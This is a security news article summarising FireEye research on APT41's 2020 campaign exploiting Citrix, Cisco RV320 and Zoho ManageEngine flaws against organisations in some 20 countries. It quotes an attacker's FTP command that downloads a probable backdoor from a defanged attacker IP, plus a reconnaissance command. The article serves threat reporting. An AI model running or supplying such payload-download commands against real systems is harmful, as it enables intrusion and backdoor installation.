One of the more active Chinese cyberespionage and cybercrime groups recently conducted a widespread attack campaign that targeted companies in banking, defense, technology, and other sectors in at least 20 countries over the last three months.
APT41 began exploiting a handful of publicly known vulnerabilities in widely deployed enterprise and SMB products at the beginning of 2020, starting with a remote code execution flaw in the Citrix Application Delivery Controller and Citrix Gateway devices (CVE-2019-19781), according to researchers at FireEye who have tracked the campaign. The attackers later moved on to exploits for vulnerabilities in Cisco routers and Zoho ManageEngine Desktop Central, all of which had been publicly disclosed prior to the group’s attacks. The campaign targeted organizations around the world, including some in Australia, Canada, France, Japan, the UK and the United States.
This is somewhat unusual activity for APT41, which has an extensive arsenal of internally developed tools and exploits, but attack groups will generally take the path of least resistance and using public exploits qualifies. Last year, for example, FireEye discovered a separate intrusion by APT41 that involved the use of a publicly available exploit for a vulnerability in the Atlassian Confluence application. As in the 2020 campaign, that intrusion involved an initial compromise and then the use of second-stage payloads and backdoors.
The campaign that FireEye discovered this year began toward the end of January and involved the targeting of the Citrix flaw. Those intrusions began about 10 days after some proof-of-concept exploit code for the vulnerability was released.
“The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the mitigation wasn’t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step,” FireEye researchers said in a report on the campaign.
“Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown payload named ‘bsd’ (which was likely a backdoor).”
“It is notable that we have only seen these exploitation attempts leverage publicly available malware."
Interestingly, the APT41 activity against Citrix devices essentially stopped from Feb. 2 through Feb. 19, which coincides with the beginning of the quarantine process in China for the COVID-19 virus. The activity picked up again around Feb. 24, but then the attackers began exploiting a known flaw in the Cisco RV320 routers. The FireEye researchers weren’t able to identify the specific exploit that APT41 used against the routers, but noted that there is a public Metasploit module that includes an exploit for the vulnerability.
Shortly after that attack, the APT41 team began focusing on a zero day vulnerability in a Zoho application at a number of different organizations.
“Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed,” the FireEye report says.
“In the first variation the CVE-2020-10189 exploit was used to directly upload ‘logger.zip’, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.”
In one variation of that attack, APT41 likely used a public PoC exploit as the basis for their operation, while in another the team used a Microsoft tool to download and run a tool from a server known to be operated by APT41. In both cases, the attackers installed a trial version of the Cobalt Strike Beacon threat emulation tool. The attackers then used that tool to download a backdoor
“It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance,” FireEye’s report says.